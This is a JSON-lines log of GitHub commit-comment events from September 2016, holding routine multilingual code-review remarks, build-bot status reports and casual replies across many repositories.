{"id":"4633518798","type":"CommitCommentEvent","actor":{"login":"javierluraschi"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":19215012,"position":null,"line":null,"path":null,"commit_id":"0cfb3de2f8ab5e9fc98c869239659090fdcfae32","created_at":"2016-09-28T21:26:52Z","updated_at":"2016-09-28T21:26:52Z","body":"@kevinushey Fixed with the latest change!"}},"created_at":"2016-09-28T21:26:52Z"}
{"id":"4633521418","type":"CommitCommentEvent","actor":{"login":"JayDemitri"},"repo":{"name":"JayDemitri/Fultra"},"payload":{"comment":{"id":19215016,"position":null,"line":null,"path":null,"commit_id":"77456599ee3645eb2a97d829abacf8680dfafbb7","created_at":"2016-09-28T21:27:21Z","updated_at":"2016-09-28T21:27:21Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Issue is Raised here and on github](https://trello.com/c/Devton0y/6-issue-is-raised-here-and-on-github)"}},"created_at":"2016-09-28T21:27:21Z"}
{"id":"4633521448","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19215017,"position":null,"line":null,"path":null,"commit_id":"2ca60b2b9f8df2916cb86a07afc3c491cde2b88d","created_at":"2016-09-28T21:27:21Z","updated_at":"2016-09-28T21:27:21Z","body":"MakeWebKitWork (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-2ca60b2b9f8df2916cb86a07afc3c491cde2b88d-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-28T21:27:21Z"}
{"id":"4633523051","type":"CommitCommentEvent","actor":{"login":"andrewdacenko"},"repo":{"name":"br-dr/best-friends"},"payload":{"comment":{"id":19215019,"position":50,"line":96,"path":"client/components/posts-list/posts-list.component.js","commit_id":"2ad8b1145c468fa7d12800fd42828bd516275029","created_at":"2016-09-28T21:27:40Z","updated_at":"2016-09-28T21:27:40Z","body":"Should use 'post' - not 'vm.post'"}},"created_at":"2016-09-28T21:27:40Z"}
{"id":"4633525250","type":"CommitCommentEvent","actor":{"login":"JayDemitri"},"repo":{"name":"JayDemitri/Fultra"},"payload":{"comment":{"id":19215021,"position":null,"line":null,"path":null,"commit_id":"77456599ee3645eb2a97d829abacf8680dfafbb7","created_at":"2016-09-28T21:28:06Z","updated_at":"2016-09-28T21:28:06Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Issue is Raised here and on github](https://trello.com/c/Devton0y/6-issue-is-raised-here-and-on-github)"}},"created_at":"2016-09-28T21:28:06Z"}
{"id":"4633526349","type":"CommitCommentEvent","actor":{"login":"p1pkin"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":19215024,"position":null,"line":null,"path":null,"commit_id":"b27bc184b3e81a71253a6f92a180ec206db65b70","created_at":"2016-09-28T21:28:18Z","updated_at":"2016-09-28T21:28:18Z","body":"c/p is evil :) thanks"}},"created_at":"2016-09-28T21:28:18Z"}
{"id":"4633528322","type":"CommitCommentEvent","actor":{"login":"JayDemitri"},"repo":{"name":"JayDemitri/Fultra"},"payload":{"comment":{"id":19215027,"position":null,"line":null,"path":null,"commit_id":"77456599ee3645eb2a97d829abacf8680dfafbb7","created_at":"2016-09-28T21:28:41Z","updated_at":"2016-09-28T21:28:41Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Issue is Raised here and on github](https://trello.com/c/Devton0y/6-issue-is-raised-here-and-on-github)"}},"created_at":"2016-09-28T21:28:41Z"}
{"id":"4633528684","type":"CommitCommentEvent","actor":{"login":"gharlan"},"repo":{"name":"yakamara/yconverter"},"payload":{"comment":{"id":19215028,"position":null,"line":null,"path":null,"commit_id":"dd728dd002119e4e0fb7147deccd6a428027c010","created_at":"2016-09-28T21:28:45Z","updated_at":"2016-09-28T21:28:45Z","body":"👏 "}},"created_at":"2016-09-28T21:28:45Z"}
{"id":"4633529155","type":"CommitCommentEvent","actor":{"login":"jmcphers"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":19215029,"position":null,"line":null,"path":null,"commit_id":"0cfb3de2f8ab5e9fc98c869239659090fdcfae32","created_at":"2016-09-28T21:28:50Z","updated_at":"2016-09-28T21:28:50Z","body":"Just validated the latest on my local machine (El Capitan) and the build machine (Mavericks) successfully. Man, what a pain. Thanks @kevinushey!"}},"created_at":"2016-09-28T21:28:50Z"}
{"id":"4633533173","type":"CommitCommentEvent","actor":{"login":"dimFora"},"repo":{"name":"dimFora/ts-course-20.09.16"},"payload":{"comment":{"id":19215038,"position":null,"line":null,"path":null,"commit_id":"a896d0f4d4211c396f95fa7a708fec0b469bba08","created_at":"2016-09-28T21:29:36Z","updated_at":"2016-09-28T21:29:36Z","body":"2я задачка далась реально легче)"}},"created_at":"2016-09-28T21:29:36Z"}
{"id":"4633538200","type":"CommitCommentEvent","actor":{"login":"modmuss50"},"repo":{"name":"modmuss50/pomf"},"payload":{"comment":{"id":19215043,"position":1,"line":1,"path":"mappings/net/minecraft/client/render/entity/EntityRenderer.mapping","commit_id":"17af94fd3c3a0f8fab3ddfd962e1fa62b104752f","created_at":"2016-09-28T21:30:32Z","updated_at":"2016-09-28T21:30:32Z","body":"This needs renaming as it renders a load of other things, like fire, name labels, debug bounding boxes and shadows. "}},"created_at":"2016-09-28T21:30:32Z"}
{"id":"4633539710","type":"CommitCommentEvent","actor":{"login":"gharlan"},"repo":{"name":"yakamara/yconverter"},"payload":{"comment":{"id":19215044,"position":673,"line":673,"path":"lib/YConverter/Converter.php","commit_id":"dd728dd002119e4e0fb7147deccd6a428027c010","created_at":"2016-09-28T21:30:49Z","updated_at":"2016-09-28T21:30:49Z","body":"Wäre nicht status=1 besser, da in R4 ja quasi alle Sprachen immer online waren? Jedenfalls eher \"online\" als \"offline\"."}},"created_at":"2016-09-28T21:30:49Z"}
{"id":"4633548060","type":"CommitCommentEvent","actor":{"login":"rezso"},"repo":{"name":"uhulinux/ub-ubk1"},"payload":{"comment":{"id":19215063,"position":null,"line":null,"path":null,"commit_id":"4f9e88fb455c6d0247505da7715a3ccbb2538127","created_at":"2016-09-28T21:32:22Z","updated_at":"2016-09-28T21:32:22Z","body":"Ezeket már meg akartam lépni korábban is.\r\nMi a fenének kell külön dpi szerinti csomag is az x.org fontoknál?\r\nA server pedig ne függjön az adott gépen felesleges input és video csomagoktól."}},"created_at":"2016-09-28T21:32:22Z"}
{"id":"4633549979","type":"CommitCommentEvent","actor":{"login":"jf---"},"repo":{"name":"DLR-SC/tigl"},"payload":{"comment":{"id":19215065,"position":null,"line":null,"path":null,"commit_id":"d706e80c95dd09db459dd6dbfd692842da2cdefc","created_at":"2016-09-28T21:32:42Z","updated_at":"2016-09-28T21:32:42Z","body":"very interesting @rainman110 , thanks for informing me, seems a very interesting and ambitious plan!\r\n"}},"created_at":"2016-09-28T21:32:42Z"}
{"id":"4633550964","type":"CommitCommentEvent","actor":{"login":"vbarhatov"},"repo":{"name":"ibarhatov/HelloWorld"},"payload":{"comment":{"id":19215069,"position":12,"line":12,"path":"HelloWorld/src/com/company/BotMessageWorker.java","commit_id":"dc2bc2d60ea903b07be1752d3e1943d58ca66930","created_at":"2016-09-28T21:32:51Z","updated_at":"2016-09-28T21:32:51Z","body":"пустой конструктор по умолчанию??? бесполезный код"}},"created_at":"2016-09-28T21:32:51Z"}
{"id":"4633552501","type":"CommitCommentEvent","actor":{"login":"vbarhatov"},"repo":{"name":"ibarhatov/HelloWorld"},"payload":{"comment":{"id":19215074,"position":15,"line":15,"path":"HelloWorld/src/com/company/BotMessageWorker.java","commit_id":"dc2bc2d60ea903b07be1752d3e1943d58ca66930","created_at":"2016-09-28T21:33:07Z","updated_at":"2016-09-28T21:33:07Z","body":"Передавать в методы воркера только необходимые объекты"}},"created_at":"2016-09-28T21:33:07Z"}
{"id":"4633560213","type":"CommitCommentEvent","actor":{"login":"vbarhatov"},"repo":{"name":"ibarhatov/HelloWorld"},"payload":{"comment":{"id":19215091,"position":12,"line":12,"path":"HelloWorld/src/com/company/BotMessageWorker.java","commit_id":"dc2bc2d60ea903b07be1752d3e1943d58ca66930","created_at":"2016-09-28T21:34:33Z","updated_at":"2016-09-28T21:34:33Z","body":"такие конструкторы имеют право на существование если ты имеешь только статические поля в классе. тогда ты создаешь private конструктор и экземпляр класса будет невозможно создать"}},"created_at":"2016-09-28T21:34:33Z"}
{"id":"4633562711","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19215097,"position":null,"line":null,"path":null,"commit_id":"6c7848bd6a41a7134ee1a70f3344a7f623da88a1","created_at":"2016-09-28T21:35:01Z","updated_at":"2016-09-28T21:35:01Z","body":"iteration (evanweaver) - i386-Windows-7-VisualStudio-12: OK (2414 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.61%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T21:35:01Z"}
{"id":"4633566660","type":"CommitCommentEvent","actor":{"login":"Tyriar"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19215115,"position":null,"line":null,"path":null,"commit_id":"48af04a01cd5a7c4b970404184af3d52c01d6625","created_at":"2016-09-28T21:35:45Z","updated_at":"2016-09-28T21:35:45Z","body":"@isidorn careful please, the terminal was completely broken after terminal.css was removed here and in https://github.com/Microsoft/vscode/commit/5b3afc132ef5d50670c1c43a2b9650da532f20e8. I fixed it via https://github.com/Microsoft/vscode/commit/411aa687f1a5bb35c6ec7a1a8ebbfef9c3b3ec9a and https://github.com/Microsoft/vscode/commit/6616c2d6eeb83c8f579ee88a5f0657c4a7520016"}},"created_at":"2016-09-28T21:35:45Z"}
{"id":"4633575291","type":"CommitCommentEvent","actor":{"login":"benbuckman"},"repo":{"name":"lpinca/shopify-token"},"payload":{"comment":{"id":19215130,"position":21,"line":58,"path":"index.js","commit_id":"70f3e58bd99c635610c6a20ee5c95c10bdb17bc3","created_at":"2016-09-28T21:37:25Z","updated_at":"2016-09-28T21:37:25Z","body":"fyi @lpinca – this means that if `timeout == null`, it'll time out immediately.\r\nShould this instead be `options.timeout ? options.timeout : 60000`? It should only use truthy values."}},"created_at":"2016-09-28T21:37:25Z"}
{"id":"4633578760","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenPLi/enigma2"},"payload":{"comment":{"id":19215138,"position":null,"line":null,"path":null,"commit_id":"5481348f5ed37e712aa0fd33d699ecda5139cf6f","created_at":"2016-09-28T21:38:04Z","updated_at":"2016-09-28T21:38:04Z","body":"Athoik, you are dealing with a complete fool when it comes to this. What do you mean \"does it exist\"? I'm not a CPP programmer so I don't normally have to deal with any of this stuff."}},"created_at":"2016-09-28T21:38:04Z"}
{"id":"4633580445","type":"CommitCommentEvent","actor":{"login":"wvu-r7"},"repo":{"name":"rapid7/metasploit-framework"},"payload":{"comment":{"id":19215143,"position":null,"line":null,"path":null,"commit_id":"988471b860b1244578f84b7b17518cc1534b205e","created_at":"2016-09-28T21:38:21Z","updated_at":"2016-09-28T21:38:21Z","body":"Derp, bad paste. Should link to http://porkmail.org/era/unix/award.html. :)"}},"created_at":"2016-09-28T21:38:21Z"}
{"id":"4633596591","type":"CommitCommentEvent","actor":{"login":"episodeyang"},"repo":{"name":"SchusterLab/M017_Yggdrasil"},"payload":{"comment":{"id":19215175,"position":null,"line":null,"path":null,"commit_id":"a2e665c3f91ce42b3befd33efc3ad06368c91832","created_at":"2016-09-28T21:41:21Z","updated_at":"2016-09-28T21:41:21Z","body":"<img width=\"1392\" alt=\"screenshot 2016-09-28 16 41 10\" src=\"https://cloud.githubusercontent.com/assets/630490/18933435/6113ff4c-859a-11e6-9833-669ca09ab9ca.png\">\r\n"}},"created_at":"2016-09-28T21:41:21Z"}
{"id":"4633596976","type":"CommitCommentEvent","actor":{"login":"ogkpmg"},"repo":{"name":"etsy/411"},"payload":{"comment":{"id":19215176,"position":null,"line":null,"path":null,"commit_id":"4894d989e04b845d0d92997bc2cf69bb9caafbac","created_at":"2016-09-28T21:41:24Z","updated_at":"2016-09-28T21:41:24Z","body":"after all the setup is done and configured, how do we access the splash screen/home page via internet browser?\r\n\r\nI tried going to the ip address, hostname, added port 9200, but only got the apache2 default page or the test log page."}},"created_at":"2016-09-28T21:41:24Z"}
{"id":"4633600587","type":"CommitCommentEvent","actor":{"login":"marhyorh"},"repo":{"name":"marhyorh/FetchGifs"},"payload":{"comment":{"id":19215185,"position":16,"line":11,"path":"src/index.js","commit_id":"2a2acd259faca07749c8cb30411e054359640b11","created_at":"2016-09-28T21:42:06Z","updated_at":"2016-09-28T21:42:06Z","body":"Yeah. You're absolutely right :+1:"}},"created_at":"2016-09-28T21:42:06Z"}
{"id":"4633600946","type":"CommitCommentEvent","actor":{"login":"khaydarov"},"repo":{"name":"ProNWE/service"},"payload":{"comment":{"id":19215186,"position":58,"line":215,"path":"application/views/organizations/blocks/jumbotron.php","commit_id":"171c7fd249dbaf955c29aa38bbe32ea89ac74ea8","created_at":"2016-09-28T21:42:10Z","updated_at":"2016-09-28T21:42:10Z","body":"Лучше оставить один раз объявление переменной. Зачем заполнять кучу в оперативной памяти ?"}},"created_at":"2016-09-28T21:42:10Z"}
{"id":"4633603373","type":"CommitCommentEvent","actor":{"login":"khaydarov"},"repo":{"name":"ProNWE/service"},"payload":{"comment":{"id":19215203,"position":68,"line":226,"path":"application/views/organizations/blocks/jumbotron.php","commit_id":"171c7fd249dbaf955c29aa38bbe32ea89ac74ea8","created_at":"2016-09-28T21:42:35Z","updated_at":"2016-09-28T21:42:35Z","body":"id на странице один. Each это цикл"}},"created_at":"2016-09-28T21:42:35Z"}
{"id":"4633605391","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19215208,"position":null,"line":null,"path":null,"commit_id":"6c7848bd6a41a7134ee1a70f3344a7f623da88a1","created_at":"2016-09-28T21:42:57Z","updated_at":"2016-09-28T21:42:57Z","body":"master (evanweaver) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-90.99%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T21:42:57Z"}
{"id":"4633605716","type":"CommitCommentEvent","actor":{"login":"marhyorh"},"repo":{"name":"marhyorh/FetchGifs"},"payload":{"comment":{"id":19215210,"position":51,"line":37,"path":"src/index.js","commit_id":"2a2acd259faca07749c8cb30411e054359640b11","created_at":"2016-09-28T21:43:01Z","updated_at":"2016-09-28T21:43:01Z","body":"Okay.. Will fix that as well. Thanks for your contributions :+1: "}},"created_at":"2016-09-28T21:43:01Z"}
{"id":"4633606366","type":"CommitCommentEvent","actor":{"login":"lusiousluhve"},"repo":{"name":"tanyakaur/Sweets-Call-Girls-Gurgaon-Night-Clubs-Sexual-Escorts-at-Tanya-Kaur-9999509194"},"payload":{"comment":{"id":19215214,"position":6,"line":6,"path":"index.html","commit_id":"8a56177317a01da3981fefc4beb791006f078c1f","created_at":"2016-09-28T21:43:09Z","updated_at":"2016-09-28T21:43:09Z","body":"<a href=\"https://github.com/tanyakaur/Sweets-Call-Girls-Gurgaon-Night-Clubs-Sexual-Escorts-at-Tanya-Kaur-9999509194/tarball/master\" class=\"btn\">Download .tar.gz</a>\r\n    </section>\r\n"}},"created_at":"2016-09-28T21:43:09Z"}
{"id":"4633607102","type":"CommitCommentEvent","actor":{"login":"MohammedObadi"},"repo":{"name":"MohammedObadi/Fatma_Amel"},"payload":{"comment":{"id":19215216,"position":2,"line":2,"path":"README.md","commit_id":"3bced5cc081891bf1f9a5c9f296d1a2a80c7e4fd","created_at":"2016-09-28T21:43:18Z","updated_at":"2016-09-28T21:43:18Z","body":"ckvjckf fkjgf gkfgj fkgfjg kfgjfkg "}},"created_at":"2016-09-28T21:43:18Z"}
{"id":"4633609231","type":"CommitCommentEvent","actor":{"login":"kordjamshidi"},"repo":{"name":"kordjamshidi/Saul_Class_Projects"},"payload":{"comment":{"id":19215221,"position":29,"line":8,"path":".gitignore","commit_id":"6df43c5d08ff2bf232f865beaf7c2dcf53ead8c9","created_at":"2016-09-28T21:43:43Z","updated_at":"2016-09-28T21:43:43Z","body":"I think there was something wrong with character encoding of this file since I removed those and typed them back, and it seems it works now. @CassieW , you can check. "}},"created_at":"2016-09-28T21:43:43Z"}
{"id":"4633611139","type":"CommitCommentEvent","actor":{"login":"remipichon"},"repo":{"name":"assomaker/manifmaker"},"payload":{"comment":{"id":19215226,"position":79,"line":205,"path":"manifmaker/client/helpers-events/task/TaskListComponent.js","commit_id":"e53066f5f20d849691b1c8c6102ea336fee45a33","created_at":"2016-09-28T21:44:04Z","updated_at":"2016-09-28T21:44:04Z","body":"@PtiLuky : parlons bonne pratique, rien de bien grave mais ce sont des conseils à garder en mémoire\r\n\r\nUtiliser le bon logger : quelque soit les logger tu auras toujours à minima par ordre de sevérité trace/info/debug/error. Il est important d'utiliser à bon escient les bons logger.s Typiquement ici tu traites d'une erreur, il faut donc utiliser console.error. \r\nPourquoi ? Le meilleur moyen de monitorer son application et de surveiller son fonctionnel est d'analyser ses logs. Si tu as des erreurs graves qui sortent en infos, les surveillances ne vont pas les détecter. \r\n\r\nMessage d'erreur autonome : en effet, tu n'as pas la garantie qu'il sera possible de remonter à la ligne de code qui a afficher une ligne de log, il faut que son message soit explicite pour comprendre rapidement son contexte et ses causes. Une bonne idée est de préciser la classe.methode concernée et de dumper les arguments ou les variables concernées par le log. Il existe des outils qui surchargent les messages de log avec ce genre d'infos, nous verrons la pertinence d'en mettre un en place. \r\n\r\nAugmenter la fiabilité de son méthodes en précisant ses arguments : si tu veux etre sur que la méthode ne soit pas appelée avec \"beforeOrAfter\" qui soit autre chose que \"before\" ou \"after\" tu as deux choix : controler l'argument au début de la méthode ou utiliser une enum à valeur fixes. \r\nBon, il n'y a pas de type en JS. L'astuce est de déclarer une variable qui est un object clef/valeur avec tes valeurs dedans (both/collection/model/enum), ensuite tu précises dans la doc de ta méthode que l'argument est du type de ton enum. Ainsi, le dev aura envie d'utiliser ton enum et donc une des clefs que tu as défini. C'est pas fiable du tout, puisque rien n'empeche le dev de passer un string ou un int en revanche tu leur auras bien expliqué ce qu'il fallait faire. Un dev JS doit etre tres précis dans son travail. \r\nSi ta méthode est un point d'entrée d'une API public ou d'un composant tres utilisé sur ManifMaker (comme les CustomSelect) c'est bien mieux de vérifier proprement chaque argument pour éviter des mauvaises suprises. Dans ton cas, la méthode \"changeDateFilter\" est une méthode privée, elle n'est utilisée que dans le component ou elle est déclarée donc pas vraiment besoin de doc ni de vérification forte. \r\n\r\nTLDR; je supprime le bloc else avec le log, rien de plus pour cette méthode."}},"created_at":"2016-09-28T21:44:04Z"}
{"id":"4633614852","type":"CommitCommentEvent","actor":{"login":"qwazarok"},"repo":{"name":"defunkt/facebox"},"payload":{"comment":{"id":19215237,"position":1,"line":125,"path":"facebox.js","commit_id":"554c03c2e432340293afd56d56cb26a80f3e336b","created_at":"2016-09-28T21:44:46Z","updated_at":"2016-09-28T21:44:46Z","body":"[a]:[a]"}},"created_at":"2016-09-28T21:44:46Z"}
{"id":"4633616170","type":"CommitCommentEvent","actor":{"login":"wjakob"},"repo":{"name":"dean0x7d/pybind11"},"payload":{"comment":{"id":19215238,"position":5,"line":394,"path":"include/pybind11/common.h","commit_id":"ed4be3f92f40a03a4f3cd80925d373af2b5783c1","created_at":"2016-09-28T21:45:01Z","updated_at":"2016-09-28T21:45:01Z","body":"+1"}},"created_at":"2016-09-28T21:45:01Z"}
{"id":"4633620758","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"Sycholic/PermissionsEx"},"payload":{"comment":{"id":19215250,"position":null,"line":null,"path":null,"commit_id":"2f4b3d0932144857abac59e13f20dc20f55798a2","created_at":"2016-09-28T21:45:51Z","updated_at":"2016-09-28T21:45:51Z","body":"@Sycholic How's the work coming along? Stable enough for testing / production use yet? :o "}},"created_at":"2016-09-28T21:45:51Z"}
{"id":"4633624105","type":"CommitCommentEvent","actor":{"login":"MohammedObadi"},"repo":{"name":"MohammedObadi/Fatma_Amel"},"payload":{"comment":{"id":19215260,"position":null,"line":null,"path":null,"commit_id":"3bced5cc081891bf1f9a5c9f296d1a2a80c7e4fd","created_at":"2016-09-28T21:46:30Z","updated_at":"2016-09-28T21:46:30Z","body":"nmnm mnmn lk lk "}},"created_at":"2016-09-28T21:46:30Z"}
{"id":"4633624630","type":"CommitCommentEvent","actor":{"login":"joakime"},"repo":{"name":"GoogleCloudPlatform/jetty-runtime"},"payload":{"comment":{"id":19215263,"position":6,"line":35,"path":"pom.xml","commit_id":"746eb6a590456b98accf451596cf0627462db6cb","created_at":"2016-09-28T21:46:36Z","updated_at":"2016-09-28T21:46:36Z","body":"This renders many plugins and third party libraries  invalid.\r\n\r\n> Advice: May only contain lowercase letters, digits, and hyphens. Must begin and end with a letter or digit. Must not exceed 63 characters.\r\n>\r\n> If at all possible, do not change the `maven.build.timestamp.format`\r\n\r\n"}},"created_at":"2016-09-28T21:46:36Z"}
{"id":"4633625092","type":"CommitCommentEvent","actor":{"login":"xthian82"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":19215265,"position":null,"line":null,"path":null,"commit_id":"8fae046f71ed6be3756f2abb1b5452fbeb5a5618","created_at":"2016-09-28T21:46:42Z","updated_at":"2016-09-28T21:46:42Z","body":"I used a helper method that every onClick just use\r\n\r\n\r\n`\r\nTextView mPhrasesText = (TextView) findViewById(R.id.phrases);\r\n        mPhrasesText.setOnClickListener(new View.OnClickListener() {\r\n            @Override\r\n            public void onClick(View v) {\r\n                startActive(PhrasesActivity.class);\r\n            }\r\n }); // etc etc\r\n\r\npublic void startActive(Class<?> activity) {\r\n        Intent intent = new Intent(this, activity);\r\n        startActivity(intent);\r\n    }`"}},"created_at":"2016-09-28T21:46:42Z"}
{"id":"4633635503","type":"CommitCommentEvent","actor":{"login":"xdkernelx"},"repo":{"name":"christopherchan35/christopherchan35.github.io"},"payload":{"comment":{"id":19215281,"position":null,"line":null,"path":null,"commit_id":"616ab983a7fe9b708043c0bd86efd267b1972796","created_at":"2016-09-28T21:48:35Z","updated_at":"2016-09-28T21:48:35Z","body":"@christopherchan35 Yes, yes, Interesting. "}},"created_at":"2016-09-28T21:48:35Z"}
{"id":"4633636247","type":"CommitCommentEvent","actor":{"login":"xdkernelx"},"repo":{"name":"christopherchan35/christopherchan35.github.io"},"payload":{"comment":{"id":19215287,"position":null,"line":null,"path":null,"commit_id":"616ab983a7fe9b708043c0bd86efd267b1972796","created_at":"2016-09-28T21:48:43Z","updated_at":"2016-09-28T21:48:43Z","body":"@christopherchan35 Very very interesting."}},"created_at":"2016-09-28T21:48:43Z"}
{"id":"4633637956","type":"CommitCommentEvent","actor":{"login":"cNille"},"repo":{"name":"careerfairsystems/recruitment"},"payload":{"comment":{"id":19215297,"position":105,"line":109,"path":"modules/taskapplications/client/controllers/generate-companyhosts.client.controller.js","commit_id":"7d63b2c204cdfb73ca12f2ba2c30b191ed972a29","created_at":"2016-09-28T21:49:03Z","updated_at":"2016-09-28T21:49:03Z","body":"Assign better variable names on row 86-109... "}},"created_at":"2016-09-28T21:49:03Z"}
{"id":"4633638439","type":"CommitCommentEvent","actor":{"login":"xdkernelx"},"repo":{"name":"christopherchan35/christopherchan35.github.io"},"payload":{"comment":{"id":19215299,"position":null,"line":null,"path":null,"commit_id":"616ab983a7fe9b708043c0bd86efd267b1972796","created_at":"2016-09-28T21:49:09Z","updated_at":"2016-09-28T21:49:09Z","body":"What is your thought process like? Like what are you thinking?"}},"created_at":"2016-09-28T21:49:09Z"}
{"id":"4633643623","type":"CommitCommentEvent","actor":{"login":"ingenieroariel"},"repo":{"name":"cga-harvard/HHypermap"},"payload":{"comment":{"id":19215310,"position":null,"line":null,"path":null,"commit_id":"14e9887736c0101eaa99b1bbae627c9ff9cecae7","created_at":"2016-09-28T21:50:08Z","updated_at":"2016-09-28T21:50:08Z","body":"@capooti master will switch to using the latest mapproxy too - it was already working with the 1.9 release."}},"created_at":"2016-09-28T21:50:08Z"}
{"id":"4633646870","type":"CommitCommentEvent","actor":{"login":"ingenieroariel"},"repo":{"name":"cga-harvard/HHypermap"},"payload":{"comment":{"id":19215318,"position":null,"line":null,"path":null,"commit_id":"14e9887736c0101eaa99b1bbae627c9ff9cecae7","created_at":"2016-09-28T21:50:42Z","updated_at":"2016-09-28T21:50:42Z","body":"@JorgeMartinezG are you sure no changes are needed for setup.py ? that one may be pointing to the wrong mapproxy."}},"created_at":"2016-09-28T21:50:42Z"}
{"id":"4633647100","type":"CommitCommentEvent","actor":{"login":"stevebeattie"},"repo":{"name":"vcaputo/systemd"},"payload":{"comment":{"id":19215320,"position":null,"line":null,"path":null,"commit_id":"4a2f1c88d3acaf3f8cba65fe359fd3f523898354","created_at":"2016-09-28T21:50:45Z","updated_at":"2016-09-28T21:50:45Z","body":"Doesn't this approach just leave the assert() waiting as a time bomb for other code paths to reach when calling manager_invoke_notify_message()? Wouldn't it be better to convert the assert() in manager_invoke_notify_message() to this test?"}},"created_at":"2016-09-28T21:50:45Z"}
{"id":"4633653456","type":"CommitCommentEvent","actor":{"login":"qwazarok"},"repo":{"name":"defunkt/facebox"},"payload":{"comment":{"id":19215331,"position":1,"line":125,"path":"facebox.js","commit_id":"554c03c2e432340293afd56d56cb26a80f3e336b","created_at":"2016-09-28T21:51:55Z","updated_at":"2016-09-28T21:51:55Z","body":"[a]:a"}},"created_at":"2016-09-28T21:51:55Z"}
{"id":"4633655099","type":"CommitCommentEvent","actor":{"login":"kszaq"},"repo":{"name":"kszaq/LibreELEC.tv"},"payload":{"comment":{"id":19215335,"position":null,"line":null,"path":null,"commit_id":"51f50059fa69b9b9b7f36113c419df973a18be55","created_at":"2016-09-28T21:52:13Z","updated_at":"2016-09-28T21:52:13Z","body":"Do you think this patch will work better: https://github.com/EmbER-Dev/Kodi/commit/27668d4803b78f52900b60d7119ddafd1853f099 ? "}},"created_at":"2016-09-28T21:52:13Z"}
{"id":"4633657175","type":"CommitCommentEvent","actor":{"login":"ScottIsAFool"},"repo":{"name":"Microsoft/UWPCommunityToolkit"},"payload":{"comment":{"id":19215341,"position":null,"line":null,"path":null,"commit_id":"73058a366e5c75809972010c999977368aedd311","created_at":"2016-09-28T21:52:36Z","updated_at":"2016-09-28T21:52:36Z","body":"Why has this commit been added to this branch?"}},"created_at":"2016-09-28T21:52:36Z"}
{"id":"4633657602","type":"CommitCommentEvent","actor":{"login":"vlouzada"},"repo":{"name":"vlouzada/EDL"},"payload":{"comment":{"id":19215344,"position":null,"line":null,"path":null,"commit_id":"2638c43e3766a8172fb036de7256e9400360b5c3","created_at":"2016-09-28T21:52:41Z","updated_at":"2016-09-28T21:52:41Z","body":"Quais seriam, professor?"}},"created_at":"2016-09-28T21:52:41Z"}
{"id":"4633659593","type":"CommitCommentEvent","actor":{"login":"deltakosh"},"repo":{"name":"Microsoft/UWPCommunityToolkit"},"payload":{"comment":{"id":19215348,"position":null,"line":null,"path":null,"commit_id":"73058a366e5c75809972010c999977368aedd311","created_at":"2016-09-28T21:53:06Z","updated_at":"2016-09-28T21:53:06Z","body":"Why not?"}},"created_at":"2016-09-28T21:53:06Z"}
{"id":"4633660098","type":"CommitCommentEvent","actor":{"login":"Light0617"},"repo":{"name":"Light0617/Web_hunter_test"},"payload":{"comment":{"id":19215349,"position":null,"line":null,"path":null,"commit_id":"5ddd8c49d60b00405866249c8647a03da0032337","created_at":"2016-09-28T21:53:11Z","updated_at":"2016-09-28T21:53:11Z","body":"OK"}},"created_at":"2016-09-28T21:53:11Z"}
{"id":"4633663726","type":"CommitCommentEvent","actor":{"login":"ScottIsAFool"},"repo":{"name":"Microsoft/UWPCommunityToolkit"},"payload":{"comment":{"id":19215360,"position":null,"line":null,"path":null,"commit_id":"73058a366e5c75809972010c999977368aedd311","created_at":"2016-09-28T21:53:52Z","updated_at":"2016-09-28T21:53:52Z","body":"Because if, for whatever reason, this PR were to be rejected/deleted/forgotten/whatever, this fix gets lost with it."}},"created_at":"2016-09-28T21:53:52Z"}
